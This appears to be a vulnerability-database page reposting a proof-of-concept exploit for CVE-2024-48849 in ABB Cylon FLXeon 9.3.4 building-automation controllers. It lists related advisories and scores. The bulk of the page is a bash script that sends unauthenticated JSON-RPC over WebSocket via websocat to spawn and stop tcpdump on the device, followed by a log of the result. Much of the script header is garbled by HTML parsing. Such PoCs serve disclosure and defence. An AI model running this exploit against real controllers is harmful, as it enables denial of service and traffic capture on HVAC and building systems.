ABB Cylon FLXeon 9.3.4 (wsConnect.js) WebSocket Command Spawning PoC

🗓️ 07 Feb 2025 00:00:00Reported by Gjoko KrsticType

zeroscience🔗 www.zeroscience.mk👁 329 Views

Vulnerability in ABB Cylon FLXeon 9.3.4 allows DoS via unauthenticated WebSocket command spawning.

Reporter	Title	Published	Views	Family All 12
0day.today	ABB Cylon FLXeon 9.3.4 wsConnect.js WebSocket Command Spawning Exploit	9 Feb 202500:00	–	zdt
Circl	CVE-2024-48849	28 Jan 202515:33	–	circl
CNNVD	ABB FLXeon 安全漏洞	29 Jan 202500:00	–	cnnvd
CNVD	ABB FLXeon Security Bypass Vulnerability	17 Feb 202500:00	–	cnvd
CVE	CVE-2024-48849	29 Jan 202518:23	–	cve
Cvelist	CVE-2024-48849 Authentication and Authorization Issues	29 Jan 202518:23	–	cvelist
Exploit DB	ABB Cylon FLXeon 9.3.4 - WebSocket Command Spawning	11 Apr 202500:00	–	exploitdb
EUVD	EUVD-2024-43246	3 Oct 202520:07	–	euvd
NVD	CVE-2024-48849	29 Jan 202519:15	–	nvd
Packet Storm	ABB Cylon FLXeon 9.3.4 wsConnect.js WebSocket Command Spawning	7 Feb 202500:00	–	packetstorm

<html><body><p>#!/bin/bash
&lt;<eoc .="" .-="" .--="" .---="" ._____="" _="" _.="" ___="" ____="" a="" abb="" advisory="" affected="" air="" allowing="" allows="" amplifying="" an="" and="" are="" as="" aspect="" attack="" attacker="" authentication="" automation="" bacnet="" be="" boilers="" building="" by="" c="" can="" capture="" captures="" cat="" cbt="" cbv="" cbx="" central="" chillers="" command="" command.="" conditions="" connectivity="" continuously="" control="" controller="" controllers="" controllers.="" cooling="" cve="" cve-2024-48849="" cylon="" data="" deliver="" denial="" desc:="" designed="" device="" discovered="" diverse="" drives="" e="" echo="" electrical="" eoc="" eof="" equipment="" execute="" exfiltration.="" exhaustion="" exit="" exploit="" exploited="" express="" fbti="" fbvi="" features="" fi="" field="" filters="" firmware:="" flxeon="" for="" frequency="" functions.="" gjoko="" handling="" heat="" https:="" hvac="" id:="" if="" impact.="" implementation="" in="" instances="" integra="" integration="" intelligent="" interface="" ip="" is="" it="" j="" jsonrpc="" kernel="" krstic="" lack="" leading="" lighting="" linux="" loop="" ltd.="" management="" metering.="" modular="" ms="" multi-zone="" multiple="" network="" new="" nodejs="" o="" of="" on="" on:="" open="" p="" page:="" pid="$!" plant="" poc="" portfolio="" ports="" potential="" processes="" product="" pump="" r="" range="" relevant="" resource="" rooftop="" scalable="" sending="" serial="" series="" service="" services.="" smart="" smartrouter="" solutions.="" spawn="" spawning="" standards="" start="" start_service="`echo" stop_service="`echo" such="" summary:="" systems="" systems.="" t="" target="wss://$IP:443/ws" tcpdump="" tested="" that="" the="" then="" this="" to="" towers="" traffic="" unauthenticated="" unauthorized="" units="" unprecedented="" url:="" users="" uses="" variable="" vendor:="" version:="" volume="" vulnerability="" vulnerable="" web="" websocket="" which="" you="" your="" zsl-2025-5913=""> $START_SERVICE\n"
sleep 1
echo "$START_SERVICE"|
websocat --insecure --one-message --buffer-size 251 --no-close "$TARGET" -v
sleep 2
echo -e "\n[+] Sending JSONRPC =&gt; $STOP_SERVICE\n"
sleep 1
echo "$STOP_SERVICE"|
websocat -k -1 -B 251 -n "$TARGET" -v
echo -e "\n[*] Done"

&lt;&lt; "LOG"
$ cd /usr/local/aam/var; journalctl -r --no-hostname --no-pager &gt;log.txt; split -n 4 log.txt
$ cat /usr/local/aam/var/xaa
$ cat /usr/local/aam/var/xab
$ cat /usr/local/aam/var/xac
$ cat /usr/local/aam/var/xad
...
#Apr 21 23:12:51 kernel: device lo left promiscuous mode
#Apr 21 23:12:34 kernel: device lo entered promiscuous mode
#Apr 21 23:12:34 node[196]: ws connect
...
LOG
</eoc></p></body></html>

07 Feb 2025 00:00Current

7.4High risk

Vulners AI Score7.4

CVSS 48.8

CVSS 3.19.4

EPSS0.00146

SSVC